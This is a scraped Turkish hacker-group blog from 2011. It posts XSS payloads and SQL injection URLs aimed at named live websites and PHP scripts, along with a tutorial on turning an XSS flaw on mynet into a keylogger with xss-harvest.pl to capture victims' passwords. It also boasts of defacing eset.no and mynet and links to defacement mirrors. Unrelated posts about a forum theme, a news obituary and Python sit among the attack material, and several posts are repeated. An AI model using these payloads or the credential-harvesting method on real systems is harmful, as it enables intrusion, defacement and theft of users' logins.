# Exploit Title: Rinkya Cross Site Scripting # Date: 22.10.2011 - 17.52 # Author: Mr.PaPaRoSSe # Tested On: BackTrack 5 - Windows xp sp3 # Platform: Php ------------------------------------------------------------- search.php http://www.rinkya.com/membership/search.php "><script>alert("DDz Mr.PaPaRoSSe")</script>http://www.rinkya.com/membership/search.php?sType=Auction&s........------------------------------------------------------------- Contact: paparosse.blogspot.com Greetz: http://DarkDevilz.in/ ------------------------------------------------------------- 3spi0n - ALEXTRAX - sanTiq0 Deathless - ZyX - Tarxes 53rh4+ - bLaCk_uMo - PeRs syntaX - Mavi_Karalýk - DarkCOD3R [And DD'z Family] [DarkDevilz - Defence And Destruction Group'z - TURKEY]
22 Ekim 2011 Cumartesi
Rinkya Cross Site Scripting
21 Ekim 2011 Cuma
WordPress ThemeCity Cross Site Scripting
# Exploit Title: WP ThemeCity XSS
# Date: 21.10.2011 - 19.05
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Demo : http://www.steveledwards.com/
Search Box
"><script>alert("DDz Mr.PaPaRoSSe")</script>
http://www.steveledwards.com/?s=%22%3E%3Cscript%3Ealert%28%22DDz+
Mr.PaPaRoSSe%22%29%3C%2Fscript%3E&submit=Search
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: paparosse.blogspot.com
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader
DARKCOD3R Santiq0 53rh4t PerS 3spi0n syntaX
[And DD'z Family]
[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> packetstorm
http://packetstormsecurity.org/files/106071/wpthemecity-xss.txt mynet.com heyk
Bir deneme yapam dedim ,öyle işte..
http://foto.aktuel.mynet.com/yarisma
http://arab-zone.org/mirror/22145/foto.aktuel.mynet.com/yarisma
http://www.askeri-darbe.org/wiev_mirr0r/?id=97994
http://proof-h.org/deface_mirror/?id=33032
http://foto.aktuel.mynet.com/yarisma
http://arab-zone.org/mirror/22145/foto.aktuel.mynet.com/yarisma
http://www.askeri-darbe.org/wiev_mirr0r/?id=97994
http://proof-h.org/deface_mirror/?id=33032
16 Ekim 2011 Pazar
14 Ekim 2011 Cuma
XSS keylogger
"Serhat kardeşim için hızlı olarak anlattım yakında video çekeceğim."
Selamun aleyküm arkadaşlar.
Mynet'te xss adlı bir konum vardı.İşte orada xss açığını keylogger gibi kullanmayı anlatacaktım.Şimdilik resimli bir anlatım yapıyorum.Ama ileride videolu olarak anlatabilirim boş bir günümde.
Şimdi bizim amacımız şu olacak.Adama bir link atacağız ve adam bu linke tıklayacak.İşte birşeyler yapacak ve login olacak.Gelen şifreyi ise biz alacağız mantık bu şekilde.Bu iş için kullanacağımız site ise mynet.
Bu olayı gerçekleştirebilmek için bize gerekenler;
BackTrack5
xss-harvest.pl (Konunun altında paylaştım.)
Xss açıklı login sistemli site
Açık bir port (bende 443)
Ve bir adet Mr.PaPaRoSSe ^^
Şimdi bir sitemize bakalım ;
http://fesmekan.mynet.com/
tarafını kullanacağım.
Şimdi ilk olarak backtrack tarafında xss-harvest.pl dosyamızı wget ile alıyoruz çağırıyoruz çekiyor her ne ise ondan sonra chmod 777 yaparak ilk işlemi bitiriyoruz.Çektiğim site ismini sildim çünkü benim depo sitem o herşeyim orada :)
Evet güzel gidiyoruz.Şimdi bizim xss-harvest için kurmamız gereken bazı perl modulleri var.
Bunun için uygulayacağımız komut ise;
sudo apt-get install libnet-server-perl
biraz beklemeniz lazım.Tamamdır iş bitti.Şimdi şey yapalım eee kurbana atacağız linki düzenleyelim.
Xss sitede şu şekilde bulunmaktadır.
http://fesmekan.mynet.com/istanbul/m...%3E&l=istanbul
Görüldüğü gibi.Kendi yazdığımız kısımları silelim böylece boş bir alan kalacak.
http://fesmekan.mynet.com/istanbul/mekanlar/?q= &l=İstanbul
Gördüğünüz o boşluğa ise belirli kodlar koyacağız.
Şimdi bu dursun backtrack tarafına giderek bir bağlantı işlemini yapalım.
./xss-harvest.pl -l -p 443
yapıyoruz.Burada ben 443. port açık olduğu için böyle birşey yaptım.Siz hangi port açıksa onu kullacaksınız.
Şimdi tekrar kod kısmına dönelim en son şu şekildeydi.
http://fesmekan.mynet.com/istanbul/mekanlar/?q= &l=İstanbul
Bunun için şöyle bir kod kullanacağız.
Selamun aleyküm arkadaşlar.
Mynet'te xss adlı bir konum vardı.İşte orada xss açığını keylogger gibi kullanmayı anlatacaktım.Şimdilik resimli bir anlatım yapıyorum.Ama ileride videolu olarak anlatabilirim boş bir günümde.
Şimdi bizim amacımız şu olacak.Adama bir link atacağız ve adam bu linke tıklayacak.İşte birşeyler yapacak ve login olacak.Gelen şifreyi ise biz alacağız mantık bu şekilde.Bu iş için kullanacağımız site ise mynet.
Bu olayı gerçekleştirebilmek için bize gerekenler;
BackTrack5
xss-harvest.pl (Konunun altında paylaştım.)
Xss açıklı login sistemli site
Açık bir port (bende 443)
Ve bir adet Mr.PaPaRoSSe ^^
Şimdi bir sitemize bakalım ;
http://fesmekan.mynet.com/
tarafını kullanacağım.
Şimdi ilk olarak backtrack tarafında xss-harvest.pl dosyamızı wget ile alıyoruz çağırıyoruz çekiyor her ne ise ondan sonra chmod 777 yaparak ilk işlemi bitiriyoruz.Çektiğim site ismini sildim çünkü benim depo sitem o herşeyim orada :)
Evet güzel gidiyoruz.Şimdi bizim xss-harvest için kurmamız gereken bazı perl modulleri var.
Bunun için uygulayacağımız komut ise;
sudo apt-get install libnet-server-perl
biraz beklemeniz lazım.Tamamdır iş bitti.Şimdi şey yapalım eee kurbana atacağız linki düzenleyelim.
Xss sitede şu şekilde bulunmaktadır.
http://fesmekan.mynet.com/istanbul/m...%3E&l=istanbul
Görüldüğü gibi.Kendi yazdığımız kısımları silelim böylece boş bir alan kalacak.
http://fesmekan.mynet.com/istanbul/mekanlar/?q= &l=İstanbul
Gördüğünüz o boşluğa ise belirli kodlar koyacağız.
Şimdi bu dursun backtrack tarafına giderek bir bağlantı işlemini yapalım.
./xss-harvest.pl -l -p 443
yapıyoruz.Burada ben 443. port açık olduğu için böyle birşey yaptım.Siz hangi port açıksa onu kullacaksınız.
Şimdi tekrar kod kısmına dönelim en son şu şekildeydi.
http://fesmekan.mynet.com/istanbul/mekanlar/?q= &l=İstanbul
Bunun için şöyle bir kod kullanacağız.
9 Ekim 2011 Pazar
Kolifa Haber Script 1.3 SQL Injection
# Exploit Title: Kolifa Haber Script 1.3 SQL
# Date: 08.10.2011 - 20:36
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Vunl file : show.php
Exploit:
http://localhost/haber_pro/kategorigoster.php?kat_id=SQL injection
Panel:
http://haberpro.awardspace.com/haber_pro/admin/admingiris.php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: paparosse.blogspot.com
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
' 3spi0n ~# Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader
L4NETLY GrayTendriL DARKCOD3R Santiq0 53rh4t PerS Mavi Karanlik Tarxes
[And DD'z Family]
[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
http://packetstormsecurity.org/files/view/105624/kolifahaber-sql.txt
# Date: 08.10.2011 - 20:36
# Author: Mr.PaPaRoSSe
# Download Script: http://scripti.org/demo.php?id=97 # Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Vunl file : show.php
Exploit:
http://localhost/haber_pro/kategorigoster.php?kat_id=SQL injection
Panel:
http://haberpro.awardspace.com/haber_pro/admin/admingiris.php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: paparosse.blogspot.com
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
' 3spi0n ~# Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader
L4NETLY GrayTendriL DARKCOD3R Santiq0 53rh4t PerS Mavi Karanlik Tarxes
[And DD'z Family]
[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
http://packetstormsecurity.org/files/view/105624/kolifahaber-sql.txt
Ebuddy XSS of p4
Şimdi ben giriş yaparken böyle birşey aklıma geldi.Daha önce bulunmuş denenmiş olabilir.Ben kendim düşündüm bunu onun için paylaşıyorum.
XSS yahoo,AIM,ICQ kısımlarında bulunmaktadır.
Author : Mr.PaPaRoSSe - DarkDevilz.in
Title : ebuddy xss
http://www.ebuddy.com
<script>alert("DarkDevilz / Mr.PaPaRoSSe")</script>
XSS yahoo,AIM,ICQ kısımlarında bulunmaktadır.
Author : Mr.PaPaRoSSe - DarkDevilz.in
Title : ebuddy xss
http://www.ebuddy.com
<script>alert("DarkDevilz / Mr.PaPaRoSSe")</script>
8 Ekim 2011 Cumartesi
havadurumu mynet xss
Bulalı bayağı oldu öyle arşive atmışım.Yakında çekeceğim video için paylaşıyorum açıkçası.Şimdi bununla nolcak derseniz backtrack tarafında bu xss açıklarını bir keylogger gibi kullanabilirsiniz.Onun da anlatımını boş bir günümde yapacağım.Bu aralar biraz meşgul'um.Ben önceden siteyi koydum ^^
##########################
# Title: havadurumu mynet xss
# Author: Mr.PaPaRoSSe | DarkDevilZ.in
##########################
http://havadurumu.mynet.com/
##########################
# Title: havadurumu mynet xss
# Author: Mr.PaPaRoSSe | DarkDevilZ.in
##########################
http://havadurumu.mynet.com/
p4 vb theme
Selamun Aleyküm arkadaşlar.
Can sıkıntısına bir tane vb teması yaptım.Paylaşayım dedim.
Sabah 6:40'da başladım 14:43'de bitti.
Cevapla butonundan ihbar butonuna kadar hepsi çalışmaktadır.
Yani örnek olarak internette bir arama yaptığınızda çoğu sitede adam linkler kısmını resim olarak vermektedir.Ama siz yeni konu dediğinizde birşey çıkmayacaktır.Yeni konu dediğinizde yeni konunun açılması için şöyle bir kod gerekmektedir.
<if condition="$show['newthreadlink']"><a href="newthread.php?$session[sessionurl]do=newthread&f=$foruminfo[forumid]" rel="nofollow"><img src="files/kate/newkonu.png" alt="$vbphrase[post_new_thread]" border="0" />
Bu tip bir kod işinizi görenecektir.Ben bunların hepsini hazırladım yaptım bitirdim halletim ^^
Üstte header tarafındaki menude kurallar kısımlarına filan link vermedim siz onları kafanıza göre yaparsınız.
3.8.6 üzerinde yaptım.Menuleri filan kendim ps ile yaptım.Uzmanlık alanları kısmı yada işte ünvan madalyon filan eklemedim çünkü şimdi postbit_legacy tarafına baktığınız da benim kodlardan filan kafanız karışsın istemedim.Siz isterseniz eklersiniz zor birşey değil sonuçta.
Onun dışında Memberinfo tarafı ile pek oynamadım basit bir düzenleme yaptım.Şu anda yazmaya devam ettiğim bir memberinfo var bittiğinde paylaşacağım.
Başka bir sayfada login olmanız lazım.Login kısmını sildim.İnternetten vbulletin ayrı sayfadan login diye aratırsanız kodları çıkar zaten.Yada vb ek sayfa yapmak şeklinde.
Resimleri üyenin gözünden ve misafirin gözünden olmak üzere 2'ye ayırdım.
Üye olmayanlara menuleri gizledim.
Resimleri ps ile birleştirdim.
-----------------------------------------------------------
Misafirin Gözlerinden;
Forumhome
------------------------------------------------------------
Bence o kadar da kötü sayılmaz ^^
Benden bu kadar takıldığınız bir yer olursa sorarsınız.
Selametle...
Not: Rar'ın içine 2 tane vbulletin-style.xml koydum.Bende biri çalışıyor biri çalışmıyor.Arkadaşta da diğeri hata vermiş.Her ihtimale karşı 2'sinide koydum.Ve ss'lerde imleç çıkmış kusura bakmayın mozillada tam ben basarkene gelmiş ^^
İNDİR
http://www.dosya.tc/server4/EzMYNC/tema.rar.html
http://hotfile.com/dl/131791239/93b3d54/tema.rar.html
Can sıkıntısına bir tane vb teması yaptım.Paylaşayım dedim.
Sabah 6:40'da başladım 14:43'de bitti.
Cevapla butonundan ihbar butonuna kadar hepsi çalışmaktadır.
Yani örnek olarak internette bir arama yaptığınızda çoğu sitede adam linkler kısmını resim olarak vermektedir.Ama siz yeni konu dediğinizde birşey çıkmayacaktır.Yeni konu dediğinizde yeni konunun açılması için şöyle bir kod gerekmektedir.
<if condition="$show['newthreadlink']"><a href="newthread.php?$session[sessionurl]do=newthread&f=$foruminfo[forumid]" rel="nofollow"><img src="files/kate/newkonu.png" alt="$vbphrase[post_new_thread]" border="0" />
Bu tip bir kod işinizi görenecektir.Ben bunların hepsini hazırladım yaptım bitirdim halletim ^^
Üstte header tarafındaki menude kurallar kısımlarına filan link vermedim siz onları kafanıza göre yaparsınız.
3.8.6 üzerinde yaptım.Menuleri filan kendim ps ile yaptım.Uzmanlık alanları kısmı yada işte ünvan madalyon filan eklemedim çünkü şimdi postbit_legacy tarafına baktığınız da benim kodlardan filan kafanız karışsın istemedim.Siz isterseniz eklersiniz zor birşey değil sonuçta.
Onun dışında Memberinfo tarafı ile pek oynamadım basit bir düzenleme yaptım.Şu anda yazmaya devam ettiğim bir memberinfo var bittiğinde paylaşacağım.
Başka bir sayfada login olmanız lazım.Login kısmını sildim.İnternetten vbulletin ayrı sayfadan login diye aratırsanız kodları çıkar zaten.Yada vb ek sayfa yapmak şeklinde.
Resimleri üyenin gözünden ve misafirin gözünden olmak üzere 2'ye ayırdım.
Üye olmayanlara menuleri gizledim.
Resimleri ps ile birleştirdim.
-----------------------------------------------------------
Misafirin Gözlerinden;
Forumhome
------------------------------------------------------------
Bence o kadar da kötü sayılmaz ^^
Benden bu kadar takıldığınız bir yer olursa sorarsınız.
Selametle...
Not: Rar'ın içine 2 tane vbulletin-style.xml koydum.Bende biri çalışıyor biri çalışmıyor.Arkadaşta da diğeri hata vermiş.Her ihtimale karşı 2'sinide koydum.Ve ss'lerde imleç çıkmış kusura bakmayın mozillada tam ben basarkene gelmiş ^^
İNDİR
http://www.dosya.tc/server4/EzMYNC/tema.rar.html
http://hotfile.com/dl/131791239/93b3d54/tema.rar.html
7 Ekim 2011 Cuma
Lessons library sql | p4
Bildiğiniz gibi bulduğum açıkları paylaşmıyordum.Paylaşmadığım içinde artık yavaş yavaş hiç açık aramamaya başladım.En son bulduğum açık 2,5 ay öndesine ayit.Bende 1-2 tane bulup yayınlayam dedim.
packetstorm
http://packetstormsecurity.org/files/view/105599/tsmim-sql.txt
# Exploit Title: Lessons library sql injection
# Date: 06.10.2011 - 18.53
# Author: Mr.PaPaRoSSe
# Download Script: http://up.tsmim.com/uploads/files/tsmim-e47615d4bd.zip
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Vunl file : show.php
Exploit:
http://localhost/droos/show.php?cid=2&page=Sql Ä°njection
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: paparosse.blogspot.com
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader
L4NETLY GrayTendriL DARKCOD3R Santiq0 53rh4t PerS
[And DD'z Family]
[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
packetstorm
http://packetstormsecurity.org/files/view/105599/tsmim-sql.txt
6 Ekim 2011 Perşembe
Steve Jobs yaşamını yitirdi
Jobs, programlama, müzik ve telefon sanayisinde devrim yaratan bilgisayar ürünlerinin beyniydi. Apple’ın eski CEO’su olan Jobs, Ağustos ayında pankreas kanseriyle boğuştuğunu açıklayarak bu görevini Tim Cook’a devretmişti. Apple’ı 1976 yılında kuran isimlerden biri olan Jobs, 2009 yılında karaciğer nakli yaptırmıştı.
DÜNYANIN BİR NUMARASI
Apple, Jobs’ın iPhone ve iPad ile yaptığı çıkışın ardından bu yıl Exxon Mobil’i geride bırakarak dünyanın en değerli şirketi unvanını kazandı. Apple’ın Eylül 1997’de 7.1 milyar dolar olan geliri, bu yıl 65.2 milyar dolara yükseldi.
Masaüstü bilgisayarı iMac ile başlattığı çıkışı birbiri ardına gelen yeni ürünlerle devam ettiren Jobs, bilgisayar çağında bir devrim başlattı. iPod satışlarıyla CD’leri tarihe gömen Jobs, müzik piyasasındaki en güçlü insanlardan biri haline geldi.
Jobs, tüketicilerin dikkatini yeni çıkaracağı ürünlere odaklamayı her zaman başardı. Apple’ın eski patronu bir keresinde, “İnsanlar genelde onlara gösterdiğiniz ana kadar ne istediklerini bilmiyorlar” demişti.
HASTALIĞINI GİZLEDİ
Steve Jobs, 2004 yılından beri eşine ender rastlanan 'nöroendokrin' denilen tümör kaynaklı bir pankreas kanseri türüyle mücadele ediyordu.
Hastalığının ilk dönemlerinde bu konuda bir açıklama yapmayan Jobs, bir süre sonra belirgin şekilde kilo kaybetmeye başladı. Karaciğer nakli olduğu 2009’da Apple’dan altı ay ayrı kalan Jobs, bu yıl Ocak ayında yine tedavi sürecine girmişti.
Yaklaşık 8.3 milyar dolar serveti olduğu tahmin edilen Jobs, “Mezarlıktaki en zengin adam olmak benim için bir anlam ifade etmiyor... Çok güzel bir şey yaptıktan sonra yatağa gitmek... benim için önemli olan bu” demişti.
JOBS'UN ARDINDAN...
www.apple.com/stevejobs sayfasında yayınlanan açıklamada, "Apple, vizyon sahibi ve yaratıcı bir dehayı, dünya ise harkulade bir insanı kaybetti. Steve’i tanıyacak ve onunla çalışacak kadar şanslı olanlarımız ise iyi bir dostunu ve ilham verici bir akıl hocasını kaybetti. Steve, arkasında yalnızca kendisinin kurabileceği bir firma bıraktı ve onun ruhu sonsuza dek Apple’ın ilham kaynağı olacak" ifadelerine yer verildi.
Jobs’ın ölümü ile ilgili düşüncelerini, anılarını ve taziyelerini paylaşmak isteyenlerin rememberingsteve@apple.com adresine e-posta gönderebilecekleri belirtildi.
http://www.hurriyet.com.tr/teknoloji/18913725.asp
4 Ekim 2011 Salı
eset.no/Hacked
Hayatta en sevmediğim şey zone almaktır.
http://www.eset.no/
http://turk-h.org/defacement/view/395903/eset.no/
http://legend-h.org/mirror/226284/eset.no/
http://www.eset.no/
http://turk-h.org/defacement/view/395903/eset.no/
http://legend-h.org/mirror/226284/eset.no/
2 Ekim 2011 Pazar
Python Tkinter
python tkinter grafik arayüz tarafı ile ilgili bir anlatım yaptım.Python iyidir herkes öğrensin :)
Kaydol:
Kayıtlar (Atom)